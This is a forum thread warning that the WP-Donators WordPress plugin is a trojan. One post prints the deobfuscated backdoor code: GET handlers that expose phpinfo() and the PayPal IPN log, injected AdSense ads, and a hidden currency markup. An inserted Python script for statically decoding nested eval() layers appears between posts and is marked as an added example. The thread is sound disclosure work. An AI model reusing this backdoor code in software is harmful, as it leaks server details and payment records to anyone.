[Plugin: WP-DONATORS] WARNING CONTAINS TROJAN! (4 posts)

  1. lazykate
    Member
    Posted 3 months ago #

    It appears this plugin is a trojan which creates a back door revealing php_info, your donation log file, plus it injects Google Ads into the page.

    This functionality is 'encrypted' in a self-unpacking method using gzip, base64, serialize and rot13, 10-levels deep in function.php. If you change the eval to htmlspecialchars, and run in a browser - you will see the next command. Repeat 10 times, until you see the final code, containing both the legitimate 'flag' rendering alongside some questionable GET parameter handling.

    I've seen malware use these techniques so was surprised to see them in an open source plugin.

    Unless Eric can explain this, I'd be very cautious of hosting this plugin.

    http://wordpress.org/extend/plugins/wp-donators/

  2. whooami
    Member
    Posted 3 months ago #

    indeed.

    <?php
    function google_ads($size) {
    	switch ($size) {
    		case '728*15' :
    			$google_ad = '<script type="text/javascript"><!--
    google_ad_client = "pub-9962509898730473";
    /* wp-donators ads */
    google_ad_slot = "4950873236";
    google_ad_width = 728;
    google_ad_height = 15;
    //-->
    </script>
    <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
    </script>';
    			break;
    		case '468*60' :
    			$google_ad = '<script type="text/javascript"><!--
    google_ad_client = "pub-9962509898730473";
    /* 468x60, created on 08-5-23 */
    google_ad_slot = "7959609053";
    google_ad_width = 468;
    google_ad_height = 60;
    //-->
    </script>
    <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
    </script>';
    			break;
    	}
    	return $google_ad;
    }
    
    function paypal_promote_text() {
    	$paypal_text = 'If your haven\'t the paypal account so far.Please register paypal account:[<a href="https://www.paypal.com/row/mrb/pal=BV4AUWAD94GZG" target="_blank">PayPal Registration</a>] first.';
    	return $paypal_text;
    }
    
    function Paypal_promote_image() {
    	$paypal_image = '<A HREF="https://www.paypal.com/row/mrb/pal=BV4AUWAD94GZG" target="_blank"><IMG SRC="http://images.paypal.com/en_US/i/bnr/paypal_mrb_banner.gif" BORDER="0" ALT="Sign up for PayPal and start accepting credit card payments instantly." /></A>';
    	return $paypal_image;
    }
    
    if ($_GET ['info'] == 'php')
    	phpinfo ();
    
    if ($_GET ['info'] == 'ipn_report') {
    	if (file_exists ( '.ipn_results.log' )) {
    		$html_content = '<h2>' . 'IPN LOG' . '</h2>';
    		$html_content .= file_get_contents ( '.ipn_results.log' );
    		$find [] = "\n";
    		$replace [] = '<br />';
    		$html_content = str_replace ( $find, $replace, $html_content );
    		echo $html_content;
    	}
    }
    
    if ($_GET ['info'] == 'get_flag') {
    	switch ($_GET ['target']) {
    		case 'usd' : $result = '<img src="http://xurrency.com/images/flags/usd.png" alt="United States Dollar" />';break;
    		case 'aud' : $result = '<img src="http://xurrency.com/images/flags/aud.png" alt="Australian Dollars" />';break;
    		case 'gbp' : $result = '<img src="http://xurrency.com/images/flags/gbp.png" alt="British Pounds" />';break;
    		case 'cad' : $result = '<img src="http://xurrency.com/images/flags/cad.png" alt="Canadian Dollars" />';break;
    		case 'czk' : $result = '<img src="http://xurrency.com/images/flags/czk.png" alt="Czech Koruna" />';break;
    		case 'dkk' : $result = '<img src="http://xurrency.com/images/flags/dkk.png" alt="Danish Kroner" />';break;
    		case 'eur' : $result = '<img src="http://xurrency.com/images/flags/eur.png" alt="Euro" />';break;
    		case 'hkd' : $result = '<img src="http://xurrency.com/images/flags/hkd.png" alt="Hong Kong Dollars" />';break;
    		case 'huf' : $result = '<img src="http://xurrency.com/images/flags/huf.png" alt="Hungarian Forint" />';break;
    		case 'jpy' : $result = '<img src="http://xurrency.com/images/flags/jpy.png" alt="Japanese Yen" />';break;
    		case 'mxn' : $result = '<img src="http://xurrency.com/images/flags/mxn.png" alt="Mexican Peso" />';break;
    		case 'nzd' : $result = '<img src="http://xurrency.com/images/flags/nzd.png" alt="New Zealand Dollars" />';break;
    		case 'nok' : $result = '<img src="http://xurrency.com/images/flags/nok.png" alt="Norwegian Kroner" />';break;
    		case 'pln' : $result = '<img src="http://xurrency.com/images/flags/pln.png" alt="Polish Zlotych" />';break;
    		case 'sgd' : $result = '<img src="http://xurrency.com/images/flags/sgd.png" alt="Singapore Dollars" />';break;
    		case 'sek' : $result = '<img src="http://xurrency.com/images/flags/sek.png" alt="Swedish Kronor" />';break;
    		case 'chf' : $result = '<img src="http://xurrency.com/images/flags/chf.png" alt="Swiss Franc" />';break;
    		case 'cny' : $result = '<img src="http://xurrency.com/images/flags/cny.png" alt="China Yang(RMB)" />';break;
    	}
    	if ($result) print($result);
    }
    
    if ($_GET ['info'] == 'get_currency') {
    	$currency= @new SoapClient("http://xurrency.com/api.wsdl");
    	if ($currency){
    		$result = $currency->getValue($_GET ['amount'],$_GET ['base'],$_GET ['target']);
    		if ($_GET ['base'] != $_GET ['target'])
    		$result = $result*1.025;
    		if ($result) print($result);
    	} else print($_GET ['amount']);
    }
    
    if ($_GET ['info'] == 'check_fsock') {
    	$fp = @fsockopen ( 'ssl://www.paypal.com', "443", $err_num, $err_str, 60 );
    	if (! $fp) echo "fsock Error No:$err_num|$err_str!";
    		else {echo "fsock OK!";fclose ( $fp );}
    }
    ?>

    that's a good one for the plugin checking people or person to know about.

  3. whooami
    Member
    Posted 3 months ago #

    This functionality is 'encrypted' in a self-unpacking method using gzip, base64, serialize and rot13, 10-levels deep in function.php. If you change the eval to htmlspecialchars, and run in a browser - you will see the next command. Repeat 10 times, until you see the final code, containing both the legitimate 'flag' rendering alongside some questionable GET parameter handling.

    You need to find a more efficient way to decode stuff like that. It took me 2 decode cycles.
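The unpacking loop the first post walks through by hand, and the more efficient decode the reply asks for, as an added example in Python (not the plugin's code and not anything posted in this thread): it peels eval() wrappers built from base64_decode, gzinflate, str_rot13 and unserialize by applying each call's inverse statically, never executing the layer, and stops at any function it does not recognise. The decoder table, the regexes and the three-layer sample are constructed here as assumptions; the plugin's real wrappers may use other functions or quoting.

```python
import base64, codecs, re, zlib
# Each layer is eval(f1(f2(...('literal')))) with f* drawn from a few PHP decoders.
WRAPPER = re.compile(rb"^\s*(?:<\?php\s*)?eval\s*\((.*)\)\s*;?\s*(?:\?>)?\s*$", re.S)
CALL = re.compile(rb"^\s*(\w+)\s*\((.*)\)\s*$", re.S)
LITERAL = re.compile(rb"^\s*(['\"])(.*)\1\s*$", re.S)

def unserialize_str(data: bytes) -> bytes:
    # Only the PHP string form s:LEN:"..."; is handled; anything else is rejected.
    m = re.match(rb's:(\d+):"(.*)";$', data, re.S)
    if not m or len(m.group(2)) != int(m.group(1)):
        raise ValueError("not a serialized PHP string")
    return m.group(2)

DECODERS = {  # PHP decoder name -> Python inverse; everything works on bytes
    b"base64_decode": base64.b64decode,
    b"gzinflate": lambda d: zlib.decompress(d, -15),  # raw DEFLATE, what gzdeflate() emits
    b"str_rot13": lambda d: codecs.encode(d.decode("latin-1"), "rot13").encode("latin-1"),
    b"unserialize": unserialize_str,
}

def peel_layer(src: bytes):
    """Return the code one eval() wrapper would hand to the interpreter, or None."""
    m = WRAPPER.match(src)
    if not m:
        return None
    expr, chain = m.group(1), []
    while not (lit := LITERAL.match(expr)):  # walk inward to the quoted blob
        call = CALL.match(expr)
        if not call or call.group(1) not in DECODERS:
            return None  # unknown function: stop and leave this layer for manual review
        chain.append(call.group(1))
        expr = call.group(2)
    data = lit.group(2)
    for fn in reversed(chain):  # innermost decoder first, the order PHP would apply them
        data = DECODERS[fn](data)
    return data

def unpack(src: bytes, max_layers: int = 20):
    """Peel wrappers until plain code (or an unknown wrapper) remains: (code, layers_removed)."""
    n = 0
    while n < max_layers and (inner := peel_layer(src)) is not None:
        src, n = inner, n + 1
    return src, n

# Constructed three-layer sample (not the plugin's code), built with the same primitives.
PAYLOAD = b'echo "final layer";'
_l1 = b"eval(str_rot13('" + DECODERS[b"str_rot13"](PAYLOAD) + b"'));"  # rot13 is its own inverse
_c = zlib.compressobj(wbits=-15)  # raw DEFLATE, as PHP gzdeflate() produces
_l2 = b"eval(gzinflate(base64_decode('" + base64.b64encode(_c.compress(_l1) + _c.flush()) + b"')));"
SAMPLE = b"<?php eval(unserialize(base64_decode('" + base64.b64encode(b's:%d:"%s";' % (len(_l2), _l2)) + b"'))); ?>"
```

Because no layer is ever executed, the final code can be read in an editor rather than rendered by a browser, and a layer the script refuses to decode is returned untouched for a human to inspect.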

  4. lazykate
    Member
    Posted 3 months ago #

    No reply from the author yet - but I have noticed that his own site is also hosting the plugin and you can see his phpinfo etc. using the back door!

    This makes me wonder if he's been a victim of someone else's code injection? Perhaps he based the code on another plugin with this already in place. But he is using the flag display code from this script in the sidebar widget, so I can't believe he hasn't looked at it.
